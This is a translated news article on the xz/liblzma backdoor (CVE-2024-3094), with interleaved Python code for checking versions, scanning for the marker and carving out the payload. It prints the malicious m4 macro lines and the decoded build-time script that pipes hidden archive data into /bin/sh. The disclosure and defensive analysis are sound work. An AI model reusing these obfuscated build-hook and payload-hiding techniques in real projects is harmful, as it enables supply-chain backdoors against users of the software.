A backdoor was found in the xz/liblzma library that allows access to sshd

In the XZ Utils package, which contains the liblzma library and a utility for working with compressed data in the ".xz" format, a backdoor (CVE-2024-3094) has been identified that allows interception and modification of the data processed by applications linked with the liblzma library. The main target of the backdoor is the OpenSSH server, which in some distributions ships linked with the libsystemd library, which in turn uses liblzma. Linking sshd with the vulnerable library allows attackers to gain access to the SSH server without authentication.

The backdoor was present in the official 5.6.0 and 5.6.1 releases, published on February 24 and March 9, which managed to make their way into some distributions and repositories, for example Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine Edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, and Manjaro Testing. All users of the xz 5.6.0 and 5.6.1 releases are advised to roll back urgently to version 5.4.6.

Among the factors mitigating the problem, it can be noted that the version of liblzma with the backdoor did not make it into the stable releases of the major distributions, but it did affect openSUSE Tumbleweed and Fedora 40-beta. Arch Linux and Gentoo used the vulnerable xz version but are not susceptible to the attack, because they do not apply the systemd-notify patch to openssh, which is what causes sshd to be linked with liblzma. The backdoor affects x86_64 systems based on the Linux kernel and the Glibc C library.
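The two conditions above (an affected liblzma version, and an sshd that actually loads it) can be checked together. The following is an added example, not code from the article or from the xz project; it parses constructed `xz --version` and `ldd /usr/sbin/sshd` output rather than running those commands itself.

```python
import re

# Releases the article names as carrying the backdoor, and the version it advises rolling back to.
AFFECTED = {(5, 6, 0), (5, 6, 1)}
ROLLBACK_TO = (5, 4, 6)

def parse_xz_version(output: str) -> dict:
    """Parse the two lines printed by `xz --version` into {"xz": (5, 6, 1), "liblzma": (5, 6, 1)}."""
    found = {}
    for line in output.splitlines():
        m = re.match(r"(xz|liblzma)\b.*?(\d+)\.(\d+)\.(\d+)", line)
        if m:
            found[m.group(1)] = tuple(int(x) for x in m.group(2, 3, 4))
    return found

def sshd_links_liblzma(ldd_output: str) -> bool:
    """True if the `ldd /usr/sbin/sshd` listing names liblzma (on Debian-style builds it
    arrives indirectly through libsystemd, as the article describes)."""
    return any(re.match(r"\s*liblzma\.so", line) for line in ldd_output.splitlines())

def assess(xz_version_output: str, ldd_output: str) -> str:
    """Combine both checks: an affected liblzma only exposes sshd when sshd actually loads it."""
    lib = parse_xz_version(xz_version_output).get("liblzma")
    if lib not in AFFECTED:
        return "not affected"
    if sshd_links_liblzma(ldd_output):
        return "vulnerable: roll back xz to %d.%d.%d" % ROLLBACK_TO
    return "affected xz installed, but sshd is not linked against liblzma"

# Constructed sample outputs (not captured from a real host).
XZ_VERSION_BAD = "xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n"
XZ_VERSION_OK = "xz (XZ Utils) 5.4.6\nliblzma 5.4.6\n"
LDD_WITH_LZMA = ("\tlibsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f00)\n"
                 "\tliblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f01)\n")
LDD_WITHOUT_LZMA = "\tlibcrypto.so.3 => /lib/x86_64-linux-gnu/libcrypto.so.3 (0x00007f02)\n"

if __name__ == "__main__":
    print(assess(XZ_VERSION_BAD, LDD_WITH_LZMA))
```

On a real host, feed the function the output of `xz --version` and `ldd /usr/sbin/sshd`; a statically linked or differently located sshd would need the path adjusted.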

The code that activates the backdoor was hidden in an m4 macro from the build-to-host.m4 file, which the automake toolkit uses during the build. During the build, in the course of obfuscated operations over archives (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma) that are used to test correct operation, an object file with malicious code was produced, which was included in the liblzma library and changed the logic of some of its functions. The m4 macros that activate the backdoor were included in the release tarballs but were not present in the Git repository. At the same time, the malicious test archives were present in the repository, i.e. the person who implemented the backdoor had access both to the repository and to the release generation process.

When liblzma is used in applications, the malicious changes could be used to intercept or modify data, or to affect the operation of sshd. In particular, the malicious code substituted the RSA_public_decrypt function in order to bypass the sshd authentication process. The backdoor included protection against detection and did not reveal itself when the LANG and TERM environment variables were set (for example, when the process was run in a terminal) and the LD_DEBUG and LD_PROFILE environment variables were not set for the /usr/sbin/sshd executable. The backdoor also had a way of detecting execution in debugging environments.

In particular, the m4/build-to-host.m4 file used:

    gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    …
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
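The grep above locates the carrier file by a marker line of the form ####xxxxx#### at the end of a line, reading binary files as text (-a). The scanner below re-implements that search as a defensive check over a source tree, and flags a build-to-host.m4 that derives gl_am_configmake from such a grep. It is an added example, not code from the article or from xz; it uses an ASCII approximation of [[:alnum:]] and a constructed sample tree.

```python
import re
import tempfile
from pathlib import Path

# Equivalent of: grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/
# -a: binary as text, -E: extended regex, -r: recurse, -l: list files, -s: silent.
# [[:alnum:]] is approximated with ASCII letters and digits (assumption).
MARKER = re.compile(rb"#{4}[A-Za-z0-9]{5}#{4}$", re.MULTILINE)

def find_marker_files(root: Path) -> list:
    """Return paths (relative to root) whose raw bytes contain the marker at the end of a line."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # like grep -s: unreadable files are skipped quietly
        if MARKER.search(data):
            hits.append(str(path.relative_to(root)))
    return hits

def suspicious_configmake(m4_text: str) -> bool:
    """Flag a build-to-host.m4 whose gl_am_configmake is produced by grepping the source tree."""
    return "gl_am_configmake" in m4_text and "grep -aErls" in m4_text

def demo() -> list:
    """Constructed sample tree: one benign test file and one carrying the marker."""
    root = Path(tempfile.mkdtemp())
    files = root / "tests" / "files"
    files.mkdir(parents=True)
    (files / "good-sample.xz").write_bytes(b"\xfd7zXZ\x00plain test data\n")
    (files / "bad-sample.bin").write_bytes(b"\x00junk\n####Hello####\n\x01\x02")
    return find_marker_files(root)

if __name__ == "__main__":
    print(demo())
```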

At the first build step, the grep operation found the file tests/files/bad-3-corrupt_lzma2.xz, which, when unpacked, produced the script:

    ####Hello####
    #345U211267$^D330^W
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    eval `grep ^srcdir= config.status`
    if test -f ../../config.status;then
    eval `grep ^srcdir= ../../config.status`
    srcdir="../../$srcdir"
    fi
    export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
    ####World####
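The pipeline above selects 16 runs of 2048 bytes (each preceded by 1024 skipped bytes) plus a final 939, drops the first 31232 bytes of the result, remaps bytes with tr, and decodes a raw LZMA1 stream. The function below re-implements that carving in Python so an analyst can extract the stage from a copy of the archive without executing the script; it is an added example, not the article's or the project's code, and the self-test runs it on a constructed carrier rather than the real good-large_compressed.lzma.

```python
import lzma

# The six source ranges of tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377",
# in tr order; tr maps the i-th source byte onto i, so the target is simply 0..255.
TR_RANGES = [(0o114, 0o321), (0o322, 0o377), (0o35, 0o47),
             (0o14, 0o34), (0o0, 0o13), (0o50, 0o113)]
TR_SRC = bytes(b for lo, hi in TR_RANGES for b in range(lo, hi + 1))
TR_FORWARD = bytes.maketrans(TR_SRC, bytes(range(256)))  # what the script applies
TR_INVERSE = bytes.maketrans(bytes(range(256)), TR_SRC)  # only for building a test carrier

# The "export i=..." head chain: 16 x (skip 1024, keep 2048), then (skip 1024, keep 939).
HEAD_CHAIN = [(1024, 2048)] * 16 + [(1024, 939)]
TAIL_OFFSET = 31233  # tail -c +31233 keeps bytes 31233..end (1-based)
RAW_LZMA1 = [{"id": lzma.FILTER_LZMA1}]  # xz -F raw --lzma1

def carve(blob: bytes) -> bytes:
    """Apply the head chain: drop `skip` bytes, keep `keep` bytes, repeat."""
    out, pos = bytearray(), 0
    for skip, keep in HEAD_CHAIN:
        pos += skip
        out += blob[pos:pos + keep]
        pos += keep
    return bytes(out)

def extract_stage(blob: bytes) -> bytes:
    """Carve, tail, remap and decompress exactly as the pipeline in the text does."""
    selected = carve(blob)[TAIL_OFFSET - 1:]
    dec = lzma.LZMADecompressor(format=lzma.FORMAT_RAW, filters=RAW_LZMA1)
    return dec.decompress(selected.translate(TR_FORWARD))

def build_test_carrier(script: bytes) -> bytes:
    """Constructed carrier for the self-test (not the real archive): the script is
    raw-LZMA1 compressed, inverse-remapped, placed after 31232 bytes of filler, and the
    skipped regions are filled with a recognisable byte."""
    stream = lzma.compress(script, format=lzma.FORMAT_RAW, filters=RAW_LZMA1)
    payload = b"." * (TAIL_OFFSET - 1) + stream.translate(TR_INVERSE)
    blob, pos = bytearray(), 0
    for skip, keep in HEAD_CHAIN:
        if pos >= len(payload):
            break
        blob += b"S" * skip + payload[pos:pos + keep]
        pos += keep
    return bytes(blob)

SAMPLE_SCRIPT = b"#!/bin/sh\necho constructed stage sample\n"

def roundtrip() -> bytes:
    """Build the constructed carrier and carve the sample script back out of it."""
    return extract_stage(build_test_carrier(SAMPLE_SCRIPT))
```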

How the attackers managed to gain access to the xz project's infrastructure has not yet been fully clarified. It is also not yet clear how many users and projects were compromised as a result of the backdoor. The alleged author of the backdoor (JiaT75 - Jia Tan), who pushed the archives with malicious code into the repository, corresponded with Fedora developers and sent pull requests to Debian related to moving the distributions to the xz 5.6.0 branch, and did not arouse suspicion, since he had been participating in xz development for the past two years and is the second developer by number of changes made. Besides the xz project, the alleged author of the backdoor also took part in the development of the xz-java and xz-embedded packages. Moreover, a few days ago Jia Tan was added to the maintainers of the XZ Embedded project used in the Linux kernel.

The malicious change was discovered after analysing excessive CPU usage and errors reported by valgrind when connecting over ssh to Debian-based systems. It is noteworthy that the xz 5.6.1 release included changes prepared by the alleged author of the backdoor in response to complaints about sshd slowness and crashes that appeared after upgrading to the xz 5.6.0 version with the backdoor. In addition, last year Jia Tan made changes that were incompatible with the "-fsanitize=address" checking mode, which led to it being disabled during fuzz testing.

Source: opennet.ru
